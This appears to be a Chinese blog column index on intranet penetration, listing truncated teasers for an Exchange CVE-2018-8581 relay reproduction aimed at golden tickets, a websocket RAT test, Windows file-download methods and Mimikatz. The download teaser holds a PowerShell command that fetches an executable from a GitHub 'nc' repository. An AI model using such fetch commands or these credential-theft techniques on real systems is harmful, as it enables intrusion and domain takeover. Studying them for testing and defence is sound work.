内网渗透
关注
分享
扫一扫
挖低危的清风
微信公众号:搞安全的废物联盟
欢迎关注
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
CVE-2018-8581复现
漏洞描述:Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据,最后可以达到全域通畅的效果。影响范围:Exchange 2010、Exchange 2013、Exchange 2016漏洞复现:环境:DC Wi...原创 2019-12-19 17:28:59 · 1079 阅读 · 0 评论 -
基于Websocket的RAT
###背景:今天在逛github的时候,无意发现了一款基于websocket传输的RAT。于是就下载下来进行了一番测试。感觉思路清奇,就做个记录吧。地址:https://github.com/Arno0x/WSC2###开始测试:1.首先在VPS上进行下载git clone https://github.com/Arno0x/WSC22.然后安装python库这里需要注意一下,我的系...原创 2019-12-19 17:26:25 · 312 阅读 · 0 评论 -
Window下的文件下载汇总-未完待续
####1.使用 powershell 的 Syetem.Net.WebClient 进行下载powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe','C:\Users\31030\Desktop\tools\te...原创 2019-12-19 17:25:27 · 526 阅读 · 0 评论 -
Mimikatz的攻击及防御
Mimikatz的攻击及防御Mimikatz的简介: Mimikatz为法国人Benjamin Delpy编写的一款轻量级的调试工具,在内网渗透过程中,它多数时候是作为一款抓取用户口令的工具。然而Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌。Mimikatz功能介绍:CRYPTO::Certificates – 列出...原创 2019-12-19 17:23:15 · 913 阅读 · 0 评论